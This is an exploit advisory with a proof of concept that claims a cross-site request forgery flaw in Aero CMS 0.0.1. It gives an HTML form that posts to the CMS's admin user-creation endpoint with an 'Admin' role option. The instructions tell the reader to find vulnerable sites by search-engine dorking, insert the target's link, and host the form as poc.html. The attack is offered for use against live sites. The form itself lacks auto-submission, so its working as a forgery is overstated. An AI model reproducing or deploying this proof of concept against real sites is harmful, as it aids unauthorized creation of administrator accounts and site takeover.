Aero CMS 0.0.1 Cross Site Request Forgery

=============================================================================================================================================| # Title     : Aero CMS v0.0.1 CSRF Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user[+] save code as poc.html .<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST">  <div>    <label for="username">Username:</label>    <input type="text" id="username" name="username" required>  </div>  <div>    <label for="password">Password:</label>    <input type="password" id="password" name="password" required>  </div>  <div>    <label for="user_email">Email:</label>    <input type="email" id="user_email" name="user_email" required>  </div>  <div>    <label for="user_first_name">First Name:</label>    <input type="text" id="user_first_name" name="user_first_name" required>  </div>  <div>    <label for="user_last_name">Last Name:</label>    <input type="text" id="user_last_name" name="user_last_name" required>  </div>  <div>    <label for="user_image">Profile Image:</label>    <input type="file" id="user_image" name="user_image">  </div>  <div>    <label for="user_role">User Role:</label>    <select id="user_role" name="user_role" required>      <option value="admin">Admin</option>      <option value="editor">Editor</option>      <option value="subscriber">Subscriber</option>    </select>  </div>  <div>    <button type="submit" name="create_user">Create User</button>  </div></form>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================